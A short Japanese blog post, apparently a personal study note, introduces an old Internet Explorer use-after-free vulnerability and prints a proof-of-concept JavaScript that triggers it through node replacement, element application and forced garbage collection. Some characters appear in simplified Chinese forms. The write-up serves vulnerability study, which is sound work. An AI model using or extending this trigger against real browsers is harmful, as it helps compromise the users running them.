これまでブログの記録を書く習慣がなかったので、今日から雑多な知識を記録して、後で復習して見るようにします.
脆弱性の概要
この脆弱性はずっと前に分析したIEのUAFで、その时の脆弱性の利用はまだ比较的に简単で、この2年间は各种の保护メカニズムの加入とシステムの安全の绝えず强化することに従って、脆弱性の利用もますます难しくなります.
まず脆弱性のpocですが、ここのpocは唯一ではなく、脆弱性の原理を知ってから自分で構築することができます.
function chg()
{
try{
marq.replaceNode(document.createTextNode("node"));
}catch(exception){}
CollectGarbage();
}
function init(){
document.body.contentEditable="true";
try{
a = document.createElement("frameset")
marq.applyElement(a);
}catch(exception){}
try{
document.selection.createRange().select();
}catch(exception){}
}